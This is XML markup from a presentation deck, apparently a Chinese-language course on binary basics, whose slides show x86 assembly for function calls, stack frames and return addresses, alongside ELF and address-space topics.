          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="389" name="Shape 389"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="384" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5098800" y="4642533"/>
            <a:ext cx="2847600" cy="860800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="390" name="Shape 390"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="383" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5146000" y="4232933"/>
            <a:ext cx="2800400" cy="1665600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Shape 391"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5719700" y="5581133"/>
            <a:ext cx="17684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1 + 2 + 3</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="392" name="Shape 392"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-144115" y="6123185"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="393" name="Shape 39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94" name="Shape 39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7" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1639E95B-D823-4D1E-A908-2535B7EDDD2B}"/>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94D83108-997F-46B2-A663-AE00D822B56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Shape 40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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop    %ebp</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01" name="Shape 40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02" name="Shape 40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03" name="Shape 403"/>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04" name="Shape 404"/>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5" name="Shape 405"/>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6" name="Shape 406"/>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7" name="Shape 407"/>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408" name="Shape 408"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="5479908"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="409" name="Shape 409"/>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10" name="Shape 410"/>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411" name="Shape 4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12" name="Shape 4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13" name="Shape 4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14" name="Shape 414"/>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415" name="Shape 415"/>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16" name="Shape 416"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="417" name="Shape 41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418" name="Shape 41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19" name="Shape 419"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="6328548"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="420" name="Shape 42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21" name="Shape 42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565AF0BD-E077-45F1-9FD5-22BB2F0B9EB0}"/>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7CE35D2-4496-4090-A2A7-395E6301BD0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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Shape 42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29" name="Shape 42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30" name="Shape 43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31" name="Shape 43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2" name="Shape 43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3" name="Shape 43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4" name="Shape 43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35" name="Shape 435"/>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36" name="Shape 436"/>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37" name="Shape 437"/>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38" name="Shape 438"/>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39" name="Shape 439"/>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40" name="Shape 440"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="441" name="Shape 44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42" name="Shape 44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3" name="Shape 443"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="5074141"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Shape 44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45" name="Shape 44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6" name="Shape 446"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="3118381"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="447" name="Shape 44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48" name="Shape 44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6FD0419D-8754-4296-AA37-E6FDE7B750D6}"/>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3C862F3-FDF8-453E-AFF3-206897AD481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Shape 454"/>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55" name="Shape 455"/>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add    $0xc,%esp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56" name="Shape 456"/>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57" name="Shape 457"/>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58" name="Shape 458"/>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59" name="Shape 459"/>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0" name="Shape 460"/>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1" name="Shape 46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62" name="Shape 462"/>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3" name="Shape 463"/>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4" name="Shape 464"/>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5" name="Shape 465"/>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6" name="Shape 466"/>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67" name="Shape 467"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="468" name="Shape 468"/>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69" name="Shape 469"/>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0" name="Shape 470"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="3321581"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="471" name="Shape 47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72" name="Shape 47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3" name="Shape 473"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="3854941"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="474" name="Shape 47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75" name="Shape 47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12369B57-76CE-4C87-A082-611225FBBB1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5F84F678-4E48-44DC-B906-834794C219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27CE4A0-64B0-4E4D-96E4-0F36E850BD62}"/>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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>二进制基础</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D36EB4-0DC5-495B-89A6-4FB3A6A77B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502725" y="2635527"/>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程序的编译与链接</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Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>下的可执行文件格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</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进程虚拟地址空间</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x86&amp;amd64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>汇编简述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06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Shape 481"/>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82" name="Shape 482"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    %eax,-0x4(%ebp)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t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>addl   $0x4,-0x4(%ebp)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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    -0x4(%ebp),%eax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83" name="Shape 483"/>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84" name="Shape 484"/>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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ret = callee(1, 2, 3) + 4</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Shape 485"/>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6" name="Shape 486"/>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7" name="Shape 487"/>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8" name="Shape 488"/>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89" name="Shape 48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0" name="Shape 49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1" name="Shape 49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2" name="Shape 49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3" name="Shape 49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94" name="Shape 494"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="495" name="Shape 495"/>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96" name="Shape 49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97" name="Shape 497"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="3931181"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="498" name="Shape 49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99" name="Shape 49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00" name="Shape 500"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="3854941"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="501" name="Shape 501"/>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highlight>
                    <a:srgbClr val="FFFFFF"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="502" name="Shape 502"/>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03" name="Shape 503"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5505033" y="3343251"/>
            <a:ext cx="2349200" cy="3252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callee(1, 2, 3)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79FEEB0B-2ABC-4B7B-86D8-759B21F8357E}"/>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AC02F2C6-0FCC-48A4-811B-56B73B4EE3B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Shape 509"/>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10" name="Shape 510"/>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11" name="Shape 511"/>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12" name="Shape 512"/>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3" name="Shape 513"/>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4" name="Shape 514"/>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5" name="Shape 515"/>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6" name="Shape 516"/>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517" name="Shape 517"/>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8" name="Shape 518"/>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9" name="Shape 519"/>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0" name="Shape 520"/>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1" name="Shape 521"/>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22" name="Shape 522"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6013200" y="2208367"/>
            <a:ext cx="1933200" cy="365600"/>
            <a:chOff x="3447575" y="1633500"/>
            <a:chExt cx="1449900" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="523" name="Shape 523"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3447575" y="1633500"/>
              <a:ext cx="9651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%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="524" name="Shape 524"/>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25" name="Shape 525"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="4134381"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="526" name="Shape 526"/>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27" name="Shape 527"/>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28" name="Shape 528"/>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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov   %ebp, $esp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pop   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="529" name="Shape 529"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="528"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30" name="Shape 530"/>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文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F14B5702-AF5F-44CB-BDA6-9C357509080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04D6CB6-A7B8-49E9-82D8-1010D40931C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6" name="Shape 536"/>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37" name="Shape 537"/>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38" name="Shape 538"/>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39" name="Shape 539"/>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40" name="Shape 540"/>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1" name="Shape 541"/>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2" name="Shape 542"/>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3" name="Shape 54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4" name="Shape 54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5" name="Shape 54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6" name="Shape 54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7" name="Shape 54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48" name="Shape 548"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="4134381"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="549" name="Shape 54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50" name="Shape 550"/>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1" name="Shape 551"/>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mov   %ebp, $esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="552" name="Shape 552"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="551"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53" name="Shape 553"/>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54" name="Shape 554"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="1822941"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="555" name="Shape 555"/>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56" name="Shape 556"/>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7" name="Shape 557"/>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ret addr (caller's caller)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F49922-A61B-4DC7-9E28-4A190D888FD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5C54D8C-C55A-4C11-B98A-C553977D567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Shape 563"/>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64" name="Shape 564"/>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&lt;callee&gt;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>leave</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Shape 565"/>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66" name="Shape 566"/>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67" name="Shape 567"/>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8" name="Shape 568"/>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9" name="Shape 569"/>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70" name="Shape 570"/>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1" name="Shape 571"/>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2" name="Shape 572"/>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3" name="Shape 573"/>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4" name="Shape 574"/>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75" name="Shape 575"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="1416541"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="576" name="Shape 576"/>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77" name="Shape 577"/>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78" name="Shape 578"/>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 addr (caller's caller)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35292D8-3CE1-45B7-96A3-6577ECBD739D}"/>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2" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09065A2A-A88A-46B6-A251-128E1A8BD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896494-AAE6-44DA-9D7C-E5B3B4201BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588135" y="1540331"/>
